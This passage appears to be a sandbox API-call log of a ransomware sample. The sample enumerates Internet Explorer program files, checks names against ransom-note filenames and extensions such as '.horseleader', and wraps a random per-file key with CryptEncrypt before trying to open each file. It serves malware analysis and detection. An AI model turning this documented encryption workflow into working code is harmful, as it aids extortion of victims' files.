[0252.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.038] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x41e00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0252.038] lstrcmpiW (lpString1="ieinstal.exe", lpString2="Windows") returned -1 [0252.038] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned 51 [0252.038] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".horseleader") returned 0x0 [0252.038] lstrcmpW (lpString1="ieinstal.exe", lpString2="#Decrypt#.txt") returned 1 [0252.038] lstrcmpW (lpString1="ieinstal.exe", lpString2="_uninstalling_.png") returned 1 [0252.038] lstrlenW (lpString=".testttjffg") returned 11 [0252.038] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe", lpSrch=".testttjffg") returned 0x0 [0252.038] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.038] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet 
explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.038] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecd4578, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xdecd4578, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe3cb04e0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0252.038] lstrcmpiW (lpString1="ielowutil.exe", lpString2="Windows") returned -1 [0252.038] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned 52 [0252.038] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".horseleader") returned 0x0 [0252.038] lstrcmpW (lpString1="ielowutil.exe", lpString2="#Decrypt#.txt") returned 1 [0252.038] lstrcmpW (lpString1="ielowutil.exe", lpString2="_uninstalling_.png") returned 1 [0252.038] lstrlenW (lpString=".testttjffg") returned 11 [0252.038] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe", lpSrch=".testttjffg") returned 0x0 [0252.038] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.038] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.039] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3803259, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3803259, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa3803259, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0252.039] lstrcmpiW (lpString1="ieproxy.dll", lpString2="Windows") returned -1 [0252.039] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll") returned 50 [0252.039] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".horseleader") returned 0x0 [0252.039] lstrcmpW (lpString1="ieproxy.dll", lpString2="#Decrypt#.txt") returned 1 [0252.039] lstrcmpW (lpString1="ieproxy.dll", lpString2="_uninstalling_.png") returned 1 [0252.039] lstrlenW (lpString=".testttjffg") returned 11 [0252.039] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll", lpSrch=".testttjffg") returned 0x0 [0252.039] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.039] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.039] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: 
lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0252.039] lstrcmpiW (lpString1="IEShims.dll", lpString2="Windows") returned -1 [0252.039] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll") returned 50 [0252.039] StrStrIW (lpFirst="IEShims.dll", lpSrch=".horseleader") returned 0x0 [0252.039] lstrcmpW (lpString1="IEShims.dll", lpString2="#Decrypt#.txt") returned 1 [0252.039] lstrcmpW (lpString1="IEShims.dll", lpString2="_uninstalling_.png") returned 1 [0252.039] lstrlenW (lpString=".testttjffg") returned 11 [0252.040] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll", lpSrch=".testttjffg") returned 0x0 [0252.040] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.040] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.040] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa387567a, ftCreationTime.dwHighDateTime=0x1cb892b, 
ftLastAccessTime.dwLowDateTime=0xa387567a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa387567a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9b10, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0252.040] lstrcmpiW (lpString1="iexplore.exe", lpString2="Windows") returned -1 [0252.040] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 51 [0252.040] StrStrIW (lpFirst="iexplore.exe", lpSrch=".horseleader") returned 0x0 [0252.040] lstrcmpW (lpString1="iexplore.exe", lpString2="#Decrypt#.txt") returned 1 [0252.040] lstrcmpW (lpString1="iexplore.exe", lpString2="_uninstalling_.png") returned 1 [0252.040] lstrlenW (lpString=".testttjffg") returned 11 [0252.040] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe", lpSrch=".testttjffg") returned 0x0 [0252.040] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.040] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.040] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3686496, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3686496, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, 
ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7b600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0252.040] lstrcmpiW (lpString1="jsdbgui.dll", lpString2="Windows") returned -1 [0252.040] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 50 [0252.041] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".horseleader") returned 0x0 [0252.041] lstrcmpW (lpString1="jsdbgui.dll", lpString2="#Decrypt#.txt") returned 1 [0252.041] lstrcmpW (lpString1="jsdbgui.dll", lpString2="_uninstalling_.png") returned 1 [0252.041] lstrlenW (lpString=".testttjffg") returned 11 [0252.041] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll", lpSrch=".testttjffg") returned 0x0 [0252.041] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.041] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.041] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54abd0a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe54abd0a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b495380, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x23600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, 
cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0252.041] lstrcmpiW (lpString1="jsdebuggeride.dll", lpString2="Windows") returned -1 [0252.041] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 56 [0252.041] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".horseleader") returned 0x0 [0252.041] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="#Decrypt#.txt") returned 1 [0252.041] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="_uninstalling_.png") returned 1 [0252.041] lstrlenW (lpString=".testttjffg") returned 11 [0252.041] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll", lpSrch=".testttjffg") returned 0x0 [0252.041] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.041] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.041] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41a0e8a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe41a0e8a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b4b9d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0252.041] lstrcmpiW 
(lpString1="JSProfilerCore.dll", lpString2="Windows") returned -1 [0252.042] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 57 [0252.042] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".horseleader") returned 0x0 [0252.042] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="#Decrypt#.txt") returned 1 [0252.042] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="_uninstalling_.png") returned 1 [0252.042] lstrlenW (lpString=".testttjffg") returned 11 [0252.042] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll", lpSrch=".testttjffg") returned 0x0 [0252.042] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.042] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.043] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36ac5f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa36ac5f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0252.043] lstrcmpiW (lpString1="jsprofilerui.dll", lpString2="Windows") returned -1 [0252.043] wnsprintfW 
(in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 55 [0252.043] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".horseleader") returned 0x0 [0252.043] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="#Decrypt#.txt") returned 1 [0252.043] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="_uninstalling_.png") returned 1 [0252.043] lstrlenW (lpString=".testttjffg") returned 11 [0252.043] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll", lpSrch=".testttjffg") returned 0x0 [0252.043] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.043] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.043] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825d0f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0x825d0f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0x5909b005, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x579f8, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0252.043] lstrcmpiW (lpString1="msdbg2.dll", lpString2="Windows") returned -1 [0252.044] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet 
Explorer\\msdbg2.dll") returned 49 [0252.044] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".horseleader") returned 0x0 [0252.044] lstrcmpW (lpString1="msdbg2.dll", lpString2="#Decrypt#.txt") returned 1 [0252.044] lstrcmpW (lpString1="msdbg2.dll", lpString2="_uninstalling_.png") returned 1 [0252.044] lstrlenW (lpString=".testttjffg") returned 11 [0252.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll", lpSrch=".testttjffg") returned 0x0 [0252.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.044] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594eb7ab, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x594eb7ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x439e9300, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x83200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0252.044] lstrcmpiW (lpString1="pdm.dll", lpString2="Windows") returned -1 [0252.044] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll") returned 46 [0252.044] StrStrIW (lpFirst="pdm.dll", lpSrch=".horseleader") returned 0x0 [0252.044] lstrcmpW (lpString1="pdm.dll", 
lpString2="#Decrypt#.txt") returned 1 [0252.044] lstrcmpW (lpString1="pdm.dll", lpString2="_uninstalling_.png") returned 1 [0252.044] lstrlenW (lpString=".testttjffg") returned 11 [0252.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll", lpSrch=".testttjffg") returned 0x0 [0252.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files\\internet explorer\\pdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.045] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0252.045] lstrcmpiW (lpString1="SIGNUP", lpString2="Windows") returned -1 [0252.045] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP") returned 45 [0252.045] lstrcmpW (lpString1="SIGNUP", lpString2=".") returned 1 [0252.045] lstrcmpW (lpString1="SIGNUP", lpString2="..") returned 1 [0252.045] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.045] 
GetProcessHeap () returned 0x780000 [0252.045] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.045] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*") returned 47 [0252.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.045] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\.") returned 47 [0252.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.046] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.046] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.046] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\..") returned 48 [0252.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.046] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0252.046] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="install.ins", cAlternateFileName="")) returned 1 [0252.046] lstrcmpiW (lpString1="install.ins", lpString2="Windows") returned -1 [0252.046] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 57 [0252.046] StrStrIW (lpFirst="install.ins", lpSrch=".horseleader") returned 0x0 [0252.046] lstrcmpW (lpString1="install.ins", lpString2="#Decrypt#.txt") returned 1 [0252.046] lstrcmpW (lpString1="install.ins", lpString2="_uninstalling_.png") returned 1 [0252.046] lstrlenW (lpString=".testttjffg") returned 11 [0252.046] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", lpSrch=".testttjffg") returned 0x0 [0252.046] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.046] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, 